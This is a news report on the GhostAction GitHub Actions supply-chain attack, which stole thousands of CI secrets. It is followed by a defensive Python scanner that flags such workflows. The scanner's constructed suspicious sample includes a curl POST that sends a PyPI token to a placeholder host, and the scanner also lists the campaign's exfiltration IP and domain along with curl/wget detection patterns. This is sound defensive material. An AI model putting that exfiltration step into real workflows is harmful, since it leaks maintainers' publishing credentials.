GhostAction Attack Steals 3,325 Secrets from GitHub Projects

GhostAction supply chain attack hit 817 GitHub repositories, stealing 3,325 secrets including npm, PyPI, and DockerHub tokens.

HackRead

On September 2, 2025, a GitHub user known as Grommash9 committed a new workflow file to the FastUUID project. The file, labelled “Github Actions Security,” appeared similar to routine automation scripts but was later found to contain malicious code designed to collect CI/CD secrets and send them to an external server.

FastUUID is an open-source Python library used in generating and working with universally unique identifiers (UUIDs) efficiently.

By September 5, cybersecurity researchers at GitGuardian had spotted the unusual activity and confirmed the FastUUID repository had been compromised. The workflow contained a command that packaged secrets into an HTTP POST request and transmitted them to a server hosted at 45.139.104.115.

The PyPI token for the project was among the data exfiltrated, but investigators found no malicious package releases during the compromise period. PyPI acted in time, locking the project in read-only mode to prevent further abuse while the maintainer removed the malicious commit.

GitGuardian’s follow-up analysis revealed that hundreds of repositories had been tampered with using nearly identical workflows. The company has since dubbed the campaign the “GhostAction” supply chain attack.

According to GitGuardian’s report shared with Hackread.com, in total, 327 developers across 817 repositories were affected, and attackers stole over 3,325 secrets. These ranged from DockerHub credentials and GitHub tokens to npm publishing keys, any of which could be misused to tamper with software supply chains.

The attackers also analysed each project’s legitimate workflow files to identify which secrets were in use, then hardcoded those same secret names into their malicious workflows.

Furthermore, each commit was personalised, adjusting the attack to each project. The exfiltration server remained consistent throughout the campaign, always pointing to the domain “plesk.page”, which stopped resolving later in the afternoon of September 5.

GitGuardian’s team raised issues directly in hundreds of compromised repositories to notify developers. They were able to alert maintainers of 573 projects, while others had either disabled GitHub issues or deleted the repository entirely. Conversations with affected developers also confirmed that some secrets were actively abused, with attackers attempting to access AWS environments and database services.

The incident affected projects in multiple programming languages, with malicious workflow commits found in Python, JavaScript, Rust, and Go repositories. Additionally, several companies found that their entire SDK portfolios had been tampered with. Since the attackers compromised many projects, the stolen npm and PyPI tokens could still be used to publish malicious releases.

By late afternoon on September 5, GitGuardian had notified GitHub, npm, and PyPI of the campaign. Security teams across these platforms are now monitoring for suspicious package publications and related activity. So far, at least 9 npm and 15 PyPI projects remain at risk due to compromised tokens, though no malicious releases have yet been confirmed.

GitGuardian has published indicators of compromise, including the workflow file name, commit message, and the malicious server address, to help teams identify whether their projects were affected.
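The two things a defender can act on from this report are the technique (a workflow step that has repository secrets in scope and pushes a request body to a server the pipeline has no reason to contact) and the published indicators (the workflow label, the server address and the domain quoted above). The following scanner is an added example written for this article, not GitGuardian’s tooling or the indicator list they published; it reads workflow text with plain regular expressions, so it needs no YAML library. The allowlist of registry hosts, the `Finding` class and both sample workflows are assumptions constructed for the example, and the raw IP in the suspicious sample is a TEST-NET placeholder rather than the address from the campaign.

```python
import re
from dataclasses import dataclass

# Indicators quoted in the article: the workflow label and the exfiltration host/domain.
ARTICLE_IOCS = {
    "workflow_names": {"Github Actions Security"},
    "hosts": {"45.139.104.115", "plesk.page"},
}

# Hosts a publishing workflow is expected to talk to. This allowlist is an assumption made
# for the example; tune it to the registries and APIs your own pipelines actually use.
ALLOWED_HOSTS = {
    "github.com", "api.github.com", "uploads.github.com",
    "pypi.org", "upload.pypi.org", "registry.npmjs.org", "hub.docker.com",
}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
WORKFLOW_NAME = re.compile(r"^name:\s*[\"']?(.+?)[\"']?\s*$", re.MULTILINE)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# curl/wget flags that attach a request body, i.e. the step is sending data, not fetching it.
SENDS_BODY = re.compile(r"(?:-X\s*POST|--data\b|--data-binary|-d\s|-F\s|--form\b|--post-data|--post-file)")


@dataclass(frozen=True)
class Finding:          # hypothetical result type for this example
    rule: str
    severity: str
    detail: str


def _outbound_hosts(line: str) -> list[str]:
    """Hosts that a curl/wget line would push a request body to."""
    if ("curl" not in line and "wget" not in line) or not SENDS_BODY.search(line):
        return []
    return URL_HOST.findall(line)


def scan_workflow(text: str) -> list[Finding]:
    """Heuristic review of one workflow file's text."""
    findings: list[Finding] = []
    secrets = sorted(set(SECRET_REF.findall(text)))

    m = WORKFLOW_NAME.search(text)
    if m and m.group(1).strip() in ARTICLE_IOCS["workflow_names"]:
        findings.append(Finding("ioc_workflow_name", "high", m.group(1).strip()))

    for host in sorted(set(URL_HOST.findall(text))):
        if host in ARTICLE_IOCS["hosts"] or host.endswith(".plesk.page"):
            findings.append(Finding("ioc_host", "high", host))

    for line in text.splitlines():
        for host in _outbound_hosts(line):
            if host in ALLOWED_HOSTS:
                continue
            if IPV4.match(host):
                findings.append(Finding("post_to_raw_ip", "high", host))
            else:
                findings.append(Finding("post_to_unlisted_host", "medium", host))
            if secrets:
                # The pattern the article describes: secrets are in scope and the step
                # ships a request body to somewhere the pipeline should not be talking to.
                findings.append(Finding("secrets_with_external_post", "critical",
                                        f"{host} <- {', '.join(secrets)}"))
    return findings


def max_severity(findings: list[Finding]) -> str:
    order = {"critical": 3, "high": 2, "medium": 1}
    return max((f.severity for f in findings), key=order.get, default="none")


# Constructed sample: a normal release workflow that legitimately uses one secret.
BENIGN_WORKFLOW = """\
name: Publish to PyPI
on:
  release:
    types: [published]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python -m pip install build && python -m build
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_TOKEN }}
"""

# Constructed sample modelled on the article's description (placeholder TEST-NET address).
SUSPICIOUS_WORKFLOW = """\
name: Github Actions Security
on: [push]
jobs:
  check:
    runs-on: ubuntu-latest
    env:
      PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
      NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
      DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
    steps:
      - run: curl -s -X POST -d "$PYPI_TOKEN" http://203.0.113.10/collect
"""

if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("suspicious", SUSPICIOUS_WORKFLOW)):
        found = scan_workflow(wf)
        print(f"{label}: {max_severity(found)}")
        for f in found:
            print(f"  [{f.severity}] {f.rule}: {f.detail}")
```

Running it over every file under `.github/workflows/` in a repository gives a quick triage pass: the benign sample produces no findings, the suspicious one fires on the workflow label, the raw-IP POST and the secrets-plus-external-POST combination. The indicator rules will age as soon as the infrastructure changes, which is why the behavioural rule (secrets in scope plus a body sent to a non-allowlisted host) is the one worth keeping in a CI policy check.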

The GhostAction campaign is still under investigation, but current findings show it to be one of the largest GitHub workflow compromises to date, affecting hundreds of projects and exposing thousands of secrets.
